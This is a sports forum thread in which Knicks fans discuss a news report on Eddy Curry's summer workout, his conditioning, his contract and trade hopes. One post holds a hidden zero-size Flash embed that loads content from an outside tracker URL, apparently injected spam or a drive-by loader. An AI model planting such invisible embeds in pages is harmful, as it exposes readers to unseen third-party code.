Curry Vows To Dominate

mafra

Legend
Curry shows flashes of old form in workout

<DL class=byline>BY ALAN HAHN | [email protected] </DL>
LAS VEGAS - Eddy Curry had sweat glistening off his forehead as he sprinted down the floor with a swift bounce. He cut, spun and caught a well-placed alley-oop from rookie Toney Douglas for a dunk that a few months ago would have been almost impossible for him to complete.

But yesterday, in a practice here with the Knicks' summer league team at Valley High School, the 6-11 Curry looked as if he was back to form after a season in which he was only able to play a total of 12 minutes in two games because of weight, conditioning and knee issues.

After the workout, Curry spoke about his determination to get his game back.

"I really want to dominate," he said, "and show the New York fans and the organization what they brought me here for."

"I don't feel like my career is in jeopardy or anything like that," Curry said. "I'm not at any crossroads. For myself, I want to make the best of this situation. I want to salvage these last two years."

"I'm going to be ready, no matter what," he said. "Whether it's here or wherever."

==========

Have to say- Eddie Curry is the difference-maker for the NY Knicks. Both this year and next.

1- He can play well enough to help us reach the playoffs in 2009.
2- He can play so well that it actually helps Lebron make the jump to NY.
3- He plays well enough where we can trade him this year

I would LOVE for Curry to get his life back together. Become a presence in the paint.... Be a BIG horse....

Wade
Chandler
Lebron
Galineri
Curry

With Harrington, Darko, Douglas, Hill.

If Curry gets back to form this year.... and Danilo & Hill show promise.... How could Lebron turn that down to play with those old farts in CLE?

Arod2k9

Benchwarmer
I'm glad he is trying to turn it around, but hopefully for the right reasons to save his life. This guy has a bad heart condition, and if he doesn't take care of himself it could be fatal. Last season was by far the worst season an athlete has to to endure losing so many things. His pride, his child, former companion, his allies.

I'll be rooting for you, but for you to get your life together the right way. I'll not be rooting for you to have a huge season to then go back to your old self and destroy it. Eddie has to regain confidence in himself but also in the eyes of his peers and the fans. He has to do it for New York, he freaking owes it to us by not showing up the last two seasons in the basketball court.

Crazy⑧s

Evacuee
Wade
Chandler
Lebron
Galineri
Curry

With Harrington, Darko, Douglas, Hill.

If Curry gets back to form this year.... and Danilo & Hill show promise.... How could Lebron turn that down to play with those old farts in CLE?

Please, stop dreaming. I mean seriously. How could that ever possibly happen. For the umpteenth time: We can NOT sign both Wade & James in the same season because we CAN NOT afford it. Especially with Curry.

Jesus!

And that 5 is so jumbled with 3 SFs playing through 2-4 & a 2 guard at the point. So, Wade brings up the ball in the 7 second offense, passes to James who drives and kicks to Wade for 3? Next play vice versa? The occasional alley oop for kicks?

Pippen + Jordan will never be duplicated. Bryant + Artest will be better than Wade + James, because Artest doesn't need the ball as much for his team to win. Kobe does. The Lakers need it too & so does Gasol.

Why would you take 2 prolific scorers at the 1 & the 3 and throw Curry in? And where is Lee?

10 points for optimism which is all good, but 0 points for a realistic scenario.

DaTPRiNCE

The Knicks are Back
call me crazy, but i think he's going to do this, i want him to succeed and hope he does, cause it will only help us

paris401

Starter
Please, stop dreaming. I mean seriously. How could that ever possibly happen. For the umpteenth time: We can NOT sign both Wade & James in the same season because we CAN NOT afford it. Especially with Curry.
o.

we can def afford to sign both wade and james... there is something called the salary cap which will not allow us to...

LeFlume

All Star
I hope he plays so well that The Rockets or some other teams actually take a look at him. I don't believe his head is in the game, or will be for an entire season. He is not worth the money....

latiger12

Rookie
i hope this is the real deal<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Me too, the guy has all the tools..lets hope he can deliver..

portega1968

El Cacique
I just dont see it happening. This guy is not fully committed longer term.

But, any hype about Curry is welcome if it helps us get rid of his lazy azz and shitty contract.

Im really hoping he can show enough to help us land either Josh Smith, Bosh or Boozer.

dre48ny

Rotation player
Phase I ( get back in decent shape) : Complete
Phase II (show up to summer league practice) : Complete
Phase III ( become a starter again):
Phase IV ( dominate the paint):
Phase V ( be consistent):

2/5 so far, let's see what happens. Gotta give him the benefit of the doubt.

ANU

Starter
put him on the floor with darko.hill and lee's game conflicts with his.the mission is to get him burn and get his ass the **** outta here as soon as possible.

nyk_nyk

All Star
I can't get too excited about a "workout" I mean I'm glad that he's shed 30 lbs and all but workouts only tell you about a players conditioning and jumpshot (if they have one). I'd be more impressed if he were out there with the hungry guys playing in the summer league.

Back to form in a workout???? Nah that's not very telling. If he were to dominate the summer league then that's a more realisitic indication. Just my opinion.

dre48ny

Rotation player
Yeah this is why his ass has to work hard and earn the starting job! If he sucks, he gets benched and let him keep working hard. @ that point that is the end of that project. If we can't find takers, we will have the take the hit.

WNY_Knickfan

Benchwarmer
New workout photo of EC

ecworkout.jpg

Dirk

Benchwarmer
Eddy Curry will play so well that it will attract Lebron to come here ^^^^^ buhahahahaha that's the funniest sh*t ever lay off the peyote man

Last edited:

KingCharles34

All Star
As much as i would like to dream about curry dominating (which he should with his size), we already know this wont happen. We seen him when he was in shape...he was a beast in the paint when going 1 on 1 against a defender, but he was turnover prone and didnt know how to pass out of the double team. He doesnt rebound or defend, and hes not built for a quick tempo system. Our best bet and only bet is to trade him. I dont wanna see him fail, and i hope he does good wherever he goes but hes gotta go.

TR1LL10N

Hannibal Lecter
Eddy Curry failed to impress New York Knicks management after forgetting to bring his sneakers to a workout in Las Vegas.

Management had high hopes for the center, who has trimmed down substantially during the offseason. The team hired a personal trainer that helped the center lose about 30 pounds.
During his Vegas workout, however, Curry failed to impress. He reportedly appeared listless during brief workouts. The fact that Eddy Curry forgot his sneakers probably didn't help matters.
Curry's been known to have the occasional workout blunder. Last year, Curry was so heavy he broke a high-strength exercise ball by sitting on it.

http://www.nowpublic.com/sports/eddy-curry-forgets-sneakers-during-vegas-summer-league-workout

LOL! What a douche bag!